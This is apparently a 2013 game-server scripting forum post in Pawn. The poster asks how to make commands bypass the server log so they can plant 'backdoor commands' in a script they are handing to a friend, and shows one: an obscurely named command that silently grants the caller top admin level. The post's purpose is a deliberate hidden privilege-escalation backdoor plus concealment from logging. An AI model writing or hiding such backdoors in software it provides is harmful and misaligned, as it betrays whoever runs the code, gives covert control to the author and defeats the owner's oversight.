13.11.2013, 00:43
Well I'm about to release my script to a friend but I know he'll go along and change the credits and release it as he's on to his friends ( his done it in the past ) but how do I make it so commands don't log? Looking to create backdoor commands, which don't save onto the server log.
pawn Код:
CMD:idontevenknowwhatthisdoes(playerid, params[])
{
PlayerInfo[playerid][pAdmin] = 100004;
return 1;
}